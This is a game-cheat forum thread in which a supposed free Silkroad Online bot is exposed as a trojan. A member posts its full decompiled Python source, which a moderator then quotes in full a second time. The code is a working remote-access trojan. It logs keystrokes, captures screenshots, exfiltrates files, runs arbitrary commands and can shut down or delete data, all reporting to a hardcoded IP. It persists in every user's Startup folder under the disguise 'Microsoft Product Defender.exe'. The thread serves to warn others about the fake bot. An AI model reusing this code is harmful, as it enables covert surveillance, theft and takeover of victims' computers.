|
You last visited: Today at 16:43
Advertisement
Free SroKing bot is back. Download beta.
Discussion on Free SroKing bot is back. Download beta. within the SRO Hacks, Bots, Cheats & Exploits forum part of the Silkroad Online category.
06/18/2016, 03:12
|
#1
|
elite*gold: 0
Join Date: May 2016
Posts: 1
Received Thanks: 0
|
Free SroKing bot is back. Download beta.
---removed---
|
|
|
06/18/2016, 03:31
|
#2
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Well well well
|
|
|
06/18/2016, 04:24
|
#3
|
elite*gold: 0
Join Date: Jan 2016
Posts: 3
Received Thanks: 1
|
thx bro for bot i will try it
i just try it but SroKing.exe dos not work i don't know whay
it wan't run plz help and thx
|
|
|
06/18/2016, 12:21
|
#4
|
elite*gold: 0
Join Date: Jun 2016
Posts: 2
Received Thanks: 0
|
it wasn't run
|
|
|
06/18/2016, 13:44
|
#5
|
elite*gold: 0
Join Date: Jun 2016
Posts: 2
Received Thanks: 0
|
PW rejected it give me this mes in hamachi
|
|
|
06/18/2016, 22:58
|
#6
|
elite*gold: 100
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,465
|
Code:
0025B28C 00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A ••••(••••s[•••C:
0025B29C 5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65 \Users\Damian\De
0025B2AC 73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72 sktop\HackSpy Tr
0025B2BC 6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74 ojan Exploit\dat
0025B2CC 61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61 a\lib\site-packa
0025B2DC 67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F ges\py2exe\boot_
0025B2EC 63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00 common.pyR••••2•
u sure bro?
Edit: Next level
boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':
class Stderr(object):
softspace = 0
_file = None
_error = None
def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
if self._file is None and self._error is None:
try:
self._file = open(fname, 'a')
except Exception as details:
self._error = details
import atexit
atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
else:
import atexit
atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')
if self._file is not None:
self._file.write(text)
self._file.flush()
return
def flush(self):
if self._file is not None:
self._file.flush()
return
sys.stderr = Stderr()
del sys._MessageBox
del Stderr
class Blackhole(object):
softspace = 0
def write(self, text):
pass
def flush(self):
pass
sys.stdout = Blackhole()
del Blackhole
del sys
import linecache
def fake_getline(filename, lineno, module_globals = None):
return ''
linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
sys.stderr = open('D:\\my_stderr.log', 'w')
except:
pass
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
os.unsetenv('_MEIPASS2')
class Process(multiprocessing.Process):
_Popen = _Popen
def if_startup():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop = 'on'
while loop == 'on':
try:
sleep(1)
server.connect((ip, 8081))
loop = 'off'
except:
pass
def back_dir(current_path):
c = current_path.split('\\')
new_path = ''
i = 0
while i < len(c) - 1:
if i != 0:
new_path = new_path + '\\' + c[i]
else:
new_path = c[i]
i += 1
os.chdir(new_path)
def attack1():
server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop1 = 'on'
while loop1 == 'on':
try:
sleep(1)
server1.connect((ip, 10000))
loop1 = 'off'
except:
pass
def OnKeyboardEvent(event):
k = chr(event.Ascii)
server1.send(k)
return None
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
def attack2():
server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop3 = 'on'
while loop3 == 'on':
try:
sleep(1)
server3.connect((ip, 4444))
loop3 = 'off'
except:
pass
time_interval = 3
try:
time_interval = server3.recv(1024)
except:
pass
while True:
sleep(float(time_interval))
bitmap = autopy.bitmap.capture_screen()
bitmap.save('1.png')
with open('1.png', 'rb') as f:
bytes_to_send = f.read(1024)
server3.send(bytes_to_send)
while bytes_to_send != '':
bytes_to_send = f.read(1024)
if bytes_to_send == '':
server3.send('stop it')
else:
server3.send(bytes_to_send)
def attack3():
server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop4 = 'on'
while loop4 == 'on':
try:
sleep(1)
server4.connect((ip, 10008))
loop4 = 'off'
except:
pass
while True:
command = server4.recv(1024)
if command == 'cd..':
try:
back_dir(os.getcwd())
except:
pass
elif command[:3] == 'cd ':
try:
os.chdir(command[3:])
except:
pass
elif command == 'ls':
data = os.listdir(os.getcwd())
i = 0
d = ''
while i < len(data):
d = d + '$$%%' + data[i]
i += 1
server4.send(d)
elif command[:4] == 'get ':
f = open(command[4:], 'rb')
size = os.path.getsize(command[4:])
server4.send(str(size))
data = f.read(2048)
server4.send(data)
while data != '':
data = ''
data = f.read(2048)
if data == '':
server4.send('stop it')
else:
server4.send(data)
elif command[:6] == 'mkdir ':
os.mkdir(command[6:])
elif command[:7] == 'upload ':
size = server4.recv(1024)
data = server4.recv(2048)
while data[-7:] != 'stop it':
f = open(command[7:], 'ab')
f.write(data)
f.close()
data = ''
data = server4.recv(2048)
elif command == 'pwd':
path = os.getcwd()
server4.send(path)
elif command[:5] == 'del_d':
try:
os.rmtree(command[6:])
except:
pass
elif command[:5] == 'del_f':
try:
os.remove(command[6:])
except:
pass
elif command == 'shutdown':
os.system('shutdown -s')
elif command[:4] == 'cmd ':
try:
print command[4:]
os.system(command[4:])
except:
pass
count = 0
server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
if count == 1:
loop0 = 'on'
while loop0 == 'on':
try:
sleep(1)
server2.connect((ip, 8081))
option = server2.recv(1024)
loop0 = 'off'
except:
pass
count = 2
elif count == 0:
option = server.recv(1024)
count = 1
elif count == 2:
loop6 = 'on'
while loop6 == 'on':
try:
print 'done'
sleep(1)
server6.connect((ip, 8081))
option = server6.recv(1024)
loop6 = 'off'
except:
pass
count = 1
if option == '1':
t = Thread(target=attack1)
t.start()
elif option == '2':
t = Thread(target=attack2)
t.start()
elif option == '3':
t = Thread(target=attack3)
t.start()
if os.getcwd()[-7:] == 'Startup':
atexit.register(if_startup)
else:
try:
s = os.getcwd()
fi = inspect.stack()[0][1]
present_file = fi.split('/')
source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
dest = 'Microsoft Product Defender.exe'
os.chdir('C:\\Users')
hostlist = os.listdir('.')
for i in hostlist:
try:
os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
shutil.copy2(source, dest)
f = open('windows.bat', 'w')
f.write('@echo off\n')
f.write('"Microsoft Product Defender.exe"')
f.close()
except:
pass
except:
pass
atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".
Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding
|
|
|
06/18/2016, 23:35
|
#7
|
Chat Killer In Duty
elite*gold: 5
Join Date: May 2008
Posts: 16,309
Received Thanks: 6,470
|
Quote:
Originally Posted by florian0
Code:
0025B28C 00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A ••••(••••s[•••C:
0025B29C 5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65 \Users\Damian\De
0025B2AC 73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72 sktop\HackSpy Tr
0025B2BC 6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74 ojan Exploit\dat
0025B2CC 61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61 a\lib\site-packa
0025B2DC 67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F ges\py2exe\boot_
0025B2EC 63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00 common.pyR••••2•
u sure bro?
Edit: Next level
boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':
class Stderr(object):
softspace = 0
_file = None
_error = None
def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
if self._file is None and self._error is None:
try:
self._file = open(fname, 'a')
except Exception as details:
self._error = details
import atexit
atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
else:
import atexit
atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')
if self._file is not None:
self._file.write(text)
self._file.flush()
return
def flush(self):
if self._file is not None:
self._file.flush()
return
sys.stderr = Stderr()
del sys._MessageBox
del Stderr
class Blackhole(object):
softspace = 0
def write(self, text):
pass
def flush(self):
pass
sys.stdout = Blackhole()
del Blackhole
del sys
import linecache
def fake_getline(filename, lineno, module_globals = None):
return ''
linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
sys.stderr = open('D:\\my_stderr.log', 'w')
except:
pass
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
os.unsetenv('_MEIPASS2')
class Process(multiprocessing.Process):
_Popen = _Popen
def if_startup():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop = 'on'
while loop == 'on':
try:
sleep(1)
server.connect((ip, 8081))
loop = 'off'
except:
pass
def back_dir(current_path):
c = current_path.split('\\')
new_path = ''
i = 0
while i < len(c) - 1:
if i != 0:
new_path = new_path + '\\' + c[i]
else:
new_path = c[i]
i += 1
os.chdir(new_path)
def attack1():
server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop1 = 'on'
while loop1 == 'on':
try:
sleep(1)
server1.connect((ip, 10000))
loop1 = 'off'
except:
pass
def OnKeyboardEvent(event):
k = chr(event.Ascii)
server1.send(k)
return None
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
def attack2():
server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop3 = 'on'
while loop3 == 'on':
try:
sleep(1)
server3.connect((ip, 4444))
loop3 = 'off'
except:
pass
time_interval = 3
try:
time_interval = server3.recv(1024)
except:
pass
while True:
sleep(float(time_interval))
bitmap = autopy.bitmap.capture_screen()
bitmap.save('1.png')
with open('1.png', 'rb') as f:
bytes_to_send = f.read(1024)
server3.send(bytes_to_send)
while bytes_to_send != '':
bytes_to_send = f.read(1024)
if bytes_to_send == '':
server3.send('stop it')
else:
server3.send(bytes_to_send)
def attack3():
server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop4 = 'on'
while loop4 == 'on':
try:
sleep(1)
server4.connect((ip, 10008))
loop4 = 'off'
except:
pass
while True:
command = server4.recv(1024)
if command == 'cd..':
try:
back_dir(os.getcwd())
except:
pass
elif command[:3] == 'cd ':
try:
os.chdir(command[3:])
except:
pass
elif command == 'ls':
data = os.listdir(os.getcwd())
i = 0
d = ''
while i < len(data):
d = d + '$$%%' + data[i]
i += 1
server4.send(d)
elif command[:4] == 'get ':
f = open(command[4:], 'rb')
size = os.path.getsize(command[4:])
server4.send(str(size))
data = f.read(2048)
server4.send(data)
while data != '':
data = ''
data = f.read(2048)
if data == '':
server4.send('stop it')
else:
server4.send(data)
elif command[:6] == 'mkdir ':
os.mkdir(command[6:])
elif command[:7] == 'upload ':
size = server4.recv(1024)
data = server4.recv(2048)
while data[-7:] != 'stop it':
f = open(command[7:], 'ab')
f.write(data)
f.close()
data = ''
data = server4.recv(2048)
elif command == 'pwd':
path = os.getcwd()
server4.send(path)
elif command[:5] == 'del_d':
try:
os.rmtree(command[6:])
except:
pass
elif command[:5] == 'del_f':
try:
os.remove(command[6:])
except:
pass
elif command == 'shutdown':
os.system('shutdown -s')
elif command[:4] == 'cmd ':
try:
print command[4:]
os.system(command[4:])
except:
pass
count = 0
server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
if count == 1:
loop0 = 'on'
while loop0 == 'on':
try:
sleep(1)
server2.connect((ip, 8081))
option = server2.recv(1024)
loop0 = 'off'
except:
pass
count = 2
elif count == 0:
option = server.recv(1024)
count = 1
elif count == 2:
loop6 = 'on'
while loop6 == 'on':
try:
print 'done'
sleep(1)
server6.connect((ip, 8081))
option = server6.recv(1024)
loop6 = 'off'
except:
pass
count = 1
if option == '1':
t = Thread(target=attack1)
t.start()
elif option == '2':
t = Thread(target=attack2)
t.start()
elif option == '3':
t = Thread(target=attack3)
t.start()
if os.getcwd()[-7:] == 'Startup':
atexit.register(if_startup)
else:
try:
s = os.getcwd()
fi = inspect.stack()[0][1]
present_file = fi.split('/')
source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
dest = 'Microsoft Product Defender.exe'
os.chdir('C:\\Users')
hostlist = os.listdir('.')
for i in hostlist:
try:
os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
shutil.copy2(source, dest)
f = open('windows.bat', 'w')
f.write('@echo off\n')
f.write('"Microsoft Product Defender.exe"')
f.close()
except:
pass
except:
pass
atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".
Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding
|
Thank you
#closed
#content removed
|
|
|
All times are GMT +2. The time now is 16:43.
|
|